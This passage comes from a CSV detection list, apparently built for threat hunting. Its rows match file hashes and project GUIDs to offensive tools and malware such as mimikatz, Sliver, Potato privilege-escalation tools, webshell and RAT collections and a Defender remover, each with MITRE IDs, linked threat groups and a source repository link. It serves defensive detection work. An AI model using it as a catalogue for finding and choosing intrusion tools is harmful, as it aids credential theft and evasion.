T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23760" "*2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745*",".{0,1000}2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","23761" "*2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319*",".{0,1000}2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23767" "*2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319*",".{0,1000}2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23768" "*2acacde7e826893c20412c5cc6e2bceb804757e030c477f743341767bb98f951*",".{0,1000}2acacde7e826893c20412c5cc6e2bceb804757e030c477f743341767bb98f951.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23769" "*2acfc293585568970aa8ea676822e0c905d4eec4c0f8c743f58ce1b099dbe29d*",".{0,1000}2acfc293585568970aa8ea676822e0c905d4eec4c0f8c743f58ce1b099dbe29d.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23772" "*2ad1fbe554f2568cacd173a5dce1f3f87dc7e2005b1fe1dd73646a8ab9a5d1ad*",".{0,1000}2ad1fbe554f2568cacd173a5dce1f3f87dc7e2005b1fe1dd73646a8ab9a5d1ad.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","23773" "*2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb*",".{0,1000}2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#jarm","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","23774" "*2AD3951D-DEA6-4CF7-88BE-4C73344AC9DA*",".{0,1000}2AD3951D\-DEA6\-4CF7\-88BE\-4C73344AC9DA.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23775" "*2ae02fc1566cb4e055e56ff446f6de80fcaf953da0fcad0ed93b6454b9fba4f1*",".{0,1000}2ae02fc1566cb4e055e56ff446f6de80fcaf953da0fcad0ed93b6454b9fba4f1.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23778" "*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#GUIDproject","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","23780" "*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#GUIDproject","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","23781" "*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#GUIDproject","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","23782" "*2aea0b4e3612b01d4550d3014d4324db74406a66e0ab14802b7033564a5771eb*",".{0,1000}2aea0b4e3612b01d4550d3014d4324db74406a66e0ab14802b7033564a5771eb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23783" "*2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3*",".{0,1000}2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - 
T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23785" "*2b085c6ae8a6a6754f6e62bebf63655eb73759ee05f6e3a625fd8fe48c3a681e*",".{0,1000}2b085c6ae8a6a6754f6e62bebf63655eb73759ee05f6e3a625fd8fe48c3a681e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23786" "*2b0a1ea2047bacd811ae1945de0e7a6709565c0ac8f67c01728965b587c27415*",".{0,1000}2b0a1ea2047bacd811ae1945de0e7a6709565c0ac8f67c01728965b587c27415.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23788" "*2b0ae5d810f64cc33f7f5df193aa56c3f39d85b0447242491da024b0a1b1a45a*",".{0,1000}2b0ae5d810f64cc33f7f5df193aa56c3f39d85b0447242491da024b0a1b1a45a.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23789" 
"*2b28e9992fa85d77397f442efeb893814d68c6d97a525ebe8d900e6bda043ac4*",".{0,1000}2b28e9992fa85d77397f442efeb893814d68c6d97a525ebe8d900e6bda043ac4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23792" "*2b2b84ccdf5351dab81dbd87860fcfbf61bf44a88fb547a7f4a3cc71667c7362*",".{0,1000}2b2b84ccdf5351dab81dbd87860fcfbf61bf44a88fb547a7f4a3cc71667c7362.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","23793" "*2b38b8acc2d37042c0f5c2a8932f59ce8d5556103a54f2665a648476d214cc45*",".{0,1000}2b38b8acc2d37042c0f5c2a8932f59ce8d5556103a54f2665a648476d214cc45.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","#filehash","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","23795" "*2b3c71c9430092f6b3d0c8675d99eee23b80410612971e902245176baf46c9cb*",".{0,1000}2b3c71c9430092f6b3d0c8675d99eee23b80410612971e902245176baf46c9cb.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23797" 
"*2B47F84C-9CA3-47E9-9970-8AF8233A9F12*",".{0,1000}2B47F84C\-9CA3\-47E9\-9970\-8AF8233A9F12.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23802" "*2b4cfde821fbe62d20d7e16e2cb8849a4847f446a7830a6f21905e791835e549*",".{0,1000}2b4cfde821fbe62d20d7e16e2cb8849a4847f446a7830a6f21905e791835e549.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23803" "*2b4d99a0fed0b109882531b7feab2545d45854c699d2f274bad28f256bdfaf78*",".{0,1000}2b4d99a0fed0b109882531b7feab2545d45854c699d2f274bad28f256bdfaf78.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23804" "*2b5afb8a567d9703dfb416099fb0452e2b4b4da5170f0b23cd3b812df2e9319c*",".{0,1000}2b5afb8a567d9703dfb416099fb0452e2b4b4da5170f0b23cd3b812df2e9319c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23806" "*2b5e05019d56c493715bbc485747a383bfb6dd8c2d44aa0f54fdbcf9cec78d4a*",".{0,1000}2b5e05019d56c493715bbc485747a383bfb6dd8c2d44aa0f54fdbcf9cec78d4a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23809" "*2b5fb43fb67ba0113f19691f759628dfa46bb2fa568fb683bda8e5c4b5b6df06*",".{0,1000}2b5fb43fb67ba0113f19691f759628dfa46bb2fa568fb683bda8e5c4b5b6df06.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23810" "*2b67667ea1e642207fbcfb15335007a6a49f6c28326032b014ba20471e233c74*",".{0,1000}2b67667ea1e642207fbcfb15335007a6a49f6c28326032b014ba20471e233c74.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - 
T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23811" "*2b67fbf351f08b878a611aeceb69fd1825f2c804b78aec158d56cba58b65a378*",".{0,1000}2b67fbf351f08b878a611aeceb69fd1825f2c804b78aec158d56cba58b65a378.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","23812" "*2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188*",".{0,1000}2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","23813" "*2b6ef9f4b59e06238caf0e4c79e023356784eff5d49313e7fae8539cc47a65ca*",".{0,1000}2b6ef9f4b59e06238caf0e4c79e023356784eff5d49313e7fae8539cc47a65ca.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23814" "*2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1*",".{0,1000}2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","23815" "*2B704D89-41B9-4051-A51C-36A82ACEBE10*",".{0,1000}2B704D89\-41B9\-4051\-A51C\-36A82ACEBE10.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23816" 
"*2b8c3873a05907a9f2d211fdc992666345d060c7376b6e9760fb800a4a54076c*",".{0,1000}2b8c3873a05907a9f2d211fdc992666345d060c7376b6e9760fb800a4a54076c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23817" "*2B914EE7-F206-4A83-B435-460D054315BB*",".{0,1000}2B914EE7\-F206\-4A83\-B435\-460D054315BB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","23819" "*2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861*",".{0,1000}2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23820" "*2b94da663635e7a44ea485c80f1b6ade7a05a6f8a927c80568c2570b98ed29e2*",".{0,1000}2b94da663635e7a44ea485c80f1b6ade7a05a6f8a927c80568c2570b98ed29e2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23822" 
"*2b9c9f74214777f8f564643b376c03b6517edb200bb62c832d17c154123aaca4*",".{0,1000}2b9c9f74214777f8f564643b376c03b6517edb200bb62c832d17c154123aaca4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23824" "*2b9f65496220a60c706897a88ed0417cdd57d1fe8c7af22abf2a69e718a0e1fc*",".{0,1000}2b9f65496220a60c706897a88ed0417cdd57d1fe8c7af22abf2a69e718a0e1fc.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","23825" "*2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107*",".{0,1000}2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","23826" "*2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859*",".{0,1000}2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23828" "*2bb07676482a8d332efd72aeb151af750b90d5e5e67fe75752dba92f3bc74786*",".{0,1000}2bb07676482a8d332efd72aeb151af750b90d5e5e67fe75752dba92f3bc74786.{0,1000}","offensive_tool_keyword","Dispossessor","CleanRDP.bat script erasing RDP traces used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23830" "*2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b*",".{0,1000}2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23831" "*2bcf6152e45cf60959f276a1e7482752895a5b17dc4d4a307a470c1a40284705*",".{0,1000}2bcf6152e45cf60959f276a1e7482752895a5b17dc4d4a307a470c1a40284705.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","23835" "*2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6*",".{0,1000}2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities 
ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","23837" "*2bd985502d207cb415eab56024e67a963e2b6c07d681f8c9ffb173fd5244cf33*",".{0,1000}2bd985502d207cb415eab56024e67a963e2b6c07d681f8c9ffb173fd5244cf33.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23839" "*2bdb8c20d1daf819c4f7722597563277e1dc4ca160b29feafc269f270baa9e2f*",".{0,1000}2bdb8c20d1daf819c4f7722597563277e1dc4ca160b29feafc269f270baa9e2f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows 